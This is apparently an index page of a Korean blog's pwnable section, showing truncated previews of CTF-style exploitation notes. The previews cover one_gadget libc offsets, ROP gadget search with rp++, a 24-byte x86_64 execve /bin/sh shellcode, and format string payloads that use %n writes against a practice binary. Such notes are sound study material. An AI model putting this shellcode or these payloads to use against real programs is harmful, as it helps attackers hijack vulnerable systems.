HACK
-
One Gadget 설치 및 사용법HACK/PWNABLE 2019. 4. 22. 23:57
> apt install ruby > gem install one_gadget > one_gadget /lib/x86_64-linux-gnu/libc.so.6 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) constraints: rcx == NULL 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a38c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL
-
ROPGadget Search 2 with rp++HACK/PWNABLE 2019. 4. 21. 21:21
wget https://github.com/0vercl0k/rp/releases/download/v1/rp-lin-x64; mv rp-lin-x64 rp64 wget https://github.com/0vercl0k/rp/releases/download/v1/rp-lin-x86; mv rp-lin-x86 rp86 export PATH=$PATH:$PWD rp64 -f /lib/x86_64-linux-gnu/libc.so.6 -r 4 |grep 'pop rdi ; ret'
-
-
-
x64/execve Shellcode (24 bytes)HACK/PWNABLE 2019. 4. 10. 11:28
/* ;Category: Shellcode ;Title: GNU/Linux x86_64 - execve /bin/sh ;Author: m4n3dw0lf ;Github: https://github.com/m4n3dw0lf ;Date: 14/06/2017 ;Architecture: Linux x86_64 ;Tested on : #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux ########## # Source # ########## section .text global _start _start: push rax xor rdx, rdx xor rsi, rsi mov rbx,'/bin//sh' push rbx push rsp pop rdi mov al, 59 sys..
-
FSB TIPSHACK/PWNABLE 2019. 3. 24. 22:26
[0xbffffa98] -> [0xdeadbeef] [input]./fsb "`python -c 'print "AAAA" + " %08x"*9'`"[output]check at 0xbffffa98argv[1] = [AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x]fmt=[AAAA b7fdc4a0 00000001 00000000 00000001 bffffbd4 00000000 00000000 04030201 41414141]check=0x4030201 [payload 1]./fsb `python -c 'print "\x98\xfa\xff\xbf"+"AAAA"+"\x9a\xfa\xff\xbf"+"%08x"*7+"%48811c%n%8126c%n"'`[payload 2]..